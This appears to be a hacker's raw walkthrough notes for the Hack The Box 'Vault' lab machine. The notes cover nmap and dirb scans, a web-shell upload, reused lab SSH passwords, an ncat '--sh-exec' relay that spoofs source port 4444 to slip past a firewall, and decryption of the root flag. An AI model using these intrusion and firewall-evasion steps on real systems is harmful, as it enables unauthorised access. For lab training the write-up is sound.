root@kali:~/HTB/boxes/Vault# nmap -sC -sV -O -A 10.10.10.109Starting Nmap 7.70

1. root@kali:~/HTB/boxes/Vault# nmap -sC -sV -O -A 10.10.10.109
2. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 14:52 MDT
3. Nmap scan report for 10.10.10.109
4. Host is up (0.15s latency).
5. Not shown: 998 closed ports
6. PORT STATE SERVICE VERSION
7. 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
8. | ssh-hostkey:
9. | 2048 a6:9d:0f:7d:73:75:bb:a8:94:0a:b7:e3:fe:1f:24:f4 (RSA)
10. | 256 2c:7c:34:eb:3a:eb:04:03:ac:48:28:54:09:74:3d:27 (ECDSA)
11. |_ 256 98:42:5f:ad:87:22:92:6d:72:e6:66:6c:82:c1:09:83 (ED25519)
12. 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
13. |_http-server-header: Apache/2.4.18 (Ubuntu)
14. |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
15. No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
16. TCP/IP fingerprint:
17. OS:SCAN(V=7.70%E=4%D=11/3%OT=22%CT=1%CU=42739%PV=Y%DS=2%DC=T%G=Y%TM=5BDE0AC
18. OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=106%TI=Z%CI=I%II=I%TS=A)SEQ
19. OS:(SP=100%GCD=1%ISR=106%TI=Z%II=I%TS=A)SEQ(SP=100%GCD=1%ISR=106%TI=Z%CI=I%
20. OS:TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5
21. OS:=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=
22. OS:7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
23. OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
24. OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
25. OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
26. OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
27. OS:%T=40%CD=S)
28.  
29. Network Distance: 2 hops
30. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
31.  
32. TRACEROUTE (using port 554/tcp)
33. HOP RTT ADDRESS
34. 1 193.74 ms 10.10.14.1
35. 2 105.66 ms 10.10.10.109
36.  
37. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
38. Nmap done: 1 IP address (1 host up) scanned in 57.83 seconds
39.  
40.  
41. root@kali:~/HTB/boxes/Vault# nmap -sU 10.10.10.109
42. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 15:12 MDT
43. Nmap scan report for 10.10.10.109
44. Host is up (0.14s latency).
45. Not shown: 997 closed ports
46. PORT STATE SERVICE
47. 389/udp open|filtered ldap
48. 631/udp open|filtered ipp
49. 5353/udp open|filtered zeroconf
50.  
51. Nmap done: 1 IP address (1 host up) scanned in 1083.23 seconds
52.  
53.  
54. root@kali:~/HTB/boxes/Vault# nmap --script=/usr/share/nmap/scripts/ssh2-enum-algos.nse 10.10.10.109
55. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 14:57 MDT
56. Nmap scan report for 10.10.10.109
57. Host is up (0.14s latency).
58. Not shown: 998 closed ports
59. PORT STATE SERVICE
60. 22/tcp open ssh
61. | ssh2-enum-algos:
62. | kex_algorithms: (6)
63. | curve25519-sha256@libssh.org
64. | ecdh-sha2-nistp256
65. | ecdh-sha2-nistp384
66. | ecdh-sha2-nistp521
67. | diffie-hellman-group-exchange-sha256
68. | diffie-hellman-group14-sha1
69. | server_host_key_algorithms: (5)
70. | ssh-rsa
71. | rsa-sha2-512
72. | rsa-sha2-256
73. | ecdsa-sha2-nistp256
74. | ssh-ed25519
75. | encryption_algorithms: (6)
76. | chacha20-poly1305@openssh.com
77. | aes128-ctr
78. | aes192-ctr
79. | aes256-ctr
80. | aes128-gcm@openssh.com
81. | aes256-gcm@openssh.com
82. | mac_algorithms: (10)
83. | umac-64-etm@openssh.com
84. | umac-128-etm@openssh.com
85. | hmac-sha2-256-etm@openssh.com
86. | hmac-sha2-512-etm@openssh.com
87. | hmac-sha1-etm@openssh.com
88. | umac-64@openssh.com
89. | umac-128@openssh.com
90. | hmac-sha2-256
91. | hmac-sha2-512
92. | hmac-sha1
93. | compression_algorithms: (2)
94. | none
95. |_ zlib@openssh.com
96. 80/tcp open http
97.  
98. Nmap done: 1 IP address (1 host up) scanned in 22.26 seconds
99.  
100. -----------------
101. DIRB v2.22
102. By The Dark Raver
103. -----------------
104.  
105. START_TIME: Sat Nov 3 15:05:13 2018
106. URL_BASE: http://10.10.10.109/sparklays/
107. WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
108.  
109. -----------------
110.  
111. GENERATED WORDS: 4612
112.  
113. ---- Scanning URL: http://10.10.10.109/sparklays/ ----
114. + http://10.10.10.109/sparklays/admin.php (CODE:200|SIZE:615)
115. ==> DIRECTORY: http://10.10.10.109/sparklays/design/
116.  
117. ---- Entering directory: http://10.10.10.109/sparklays/design/ ----
118. ==> DIRECTORY: http://10.10.10.109/sparklays/design/uploads/
119.  
120. ---- Entering directory: http://10.10.10.109/sparklays/design/uploads/ ----
121.  
122. -----------------
123. END_TIME: Sat Nov 3 15:36:08 2018
124. DOWNLOADED: 13836 - FOUND: 1
125.  
126. LOGIN PAGE
127. http://10.10.10.109/sparklays/admin.php
128.  
129. UPLOAD FILES
130. http://10.10.10.109/sparklays/design/changelogo.php
131.  
132. UPLOADED POWNY@SHELL TO GAIN WEB BROWSER SHELL AND FOUND SSH PASSWORD IN DAVE DESKTOP FOLDER
133. ssh dave@10.10.10.109
134. Dav3therav3123
135.  
136. FOUND FILE ENTITLED KEY THAT CONTAINS
137. itscominghome
138.  
139. ACCESS WEBSITE FROM SERVER
140. ssh -D 8080 dave@10.10.10.109
141.  
142. ==============================================================================================================
143. REWORK THIS AREA
144. ==============================================================================================================
145. MORE CREDENTIALS FOUND
146. root@DNS: var www DNS desktop# cat ssh
147. dave
148. dav3gerous567
149.  
150. SSH INTO DNS SERVER
151. ssh dave@192.168.122.4
152. dav3gerous567
153.  
154. READ ALEX .BASG_HISTORY AND LOOKED AT VISUDO FILE WHICH LETS ADMINS SUDO AS ROOT
155.  
156. BECOME ROOT
157. sudo su -
158. dav3gerous567
159.  
160. TRACEROUTE (using port 1723/tcp)
161. HOP RTT ADDRESS
162. 1 0.82 ms 192.168.5.1
163.  
164. Nmap scan report for Vault (192.168.5.2)
165. Host is up (0.0021s latency).
166. Not shown: 998 filtered ports
167. PORT STATE SERVICE VERSION
168. 53/tcp closed domain
169. 4444/tcp closed krb524
170. Too many fingerprints match this host to give specific OS details
171. Network Distance: 2 hops
172.  
173. TRACEROUTE (using port 53/tcp)
174. HOP RTT ADDRESS
175. 1 0.98 ms 192.168.122.5
176. 2 1.86 ms Vault (192.168.5.2)
177.  
178. HOW TO +++++====================================================================================================
179. SEE WHAT PORTS ARE OPEN ON VAULT
180. cat /var/log/auth.log | grep -a 192.168.5.2
181. (port 4444 is used for ssh)
182.  
183. SET UP A LISTENER
184. ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444" &
185.  
186. ENSURE PORT IS OPEN
187. /usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f
188.  
189. SSH IN
190. ssh dave@localhost -p 5555
191.  
192. IS PORT BEING USED BY SOMEONE ELSE
193. ps aux | grep ncat
194.  
195. dave@vault:~$ ls
196. root.txt.gpg
197.  
198. SCP IT BACK TO UBUNTU MACHINE ENSURE NCAT IS WORKING
199. root@DNS:~# ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444" &
200. [1] 14627
201.  
202. COPY FILE FROM VAULT TO DNS USING SCP FROM DNS
203. root@DNS:~# scp -P 5555 dave@localhost:/home/dave/root.txt.gpg /tmp
204. dave@localhost's password:
205. root.txt.gpg 100% 629 0.6KB/s 00:00
206. [1]+ Done ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444"
207. root@DNS:~# cd /tmp
208. root@DNS:/tmp# ls
209. root.txt.gpg test.txt
210.  
211. COPY FILE FROM DNS TO UBUNTU FROM THE UBUNTU MACHINE
212. dave@ubuntu:~$ scp dave@192.168.122.4:/tmp/root.txt.gpg /dev/shm/
213. dave@192.168.122.4's password:
214. root.txt.gpg 100% 629 0.6KB/s 00:00
215. dave@ubuntu:~$ cd /dev/shm
216.  
217. DECRYPT THE GPG ROOT FILE USING THE KEY FOUND IN DAVES DESKTOP FOLDER
218. dave@ubuntu:/dev/shm$ gpg -d root.txt.gpg
219.  
220. You need a passphrase to unlock the secret key for
221. user: "david <dave@david.com>"
222. 4096-bit RSA key, ID D1EB1F03, created 2018-07-24 (main key ID 0FDFBFE4)
223.  
224. gpg: encrypted with 4096-bit RSA key, ID D1EB1F03, created 2018-07-24
225. "david <dave@david.com>"
226. itscominghome
227.  
228. ROOT FILE
229. ca468370b91d1f5906e31093d9bfe819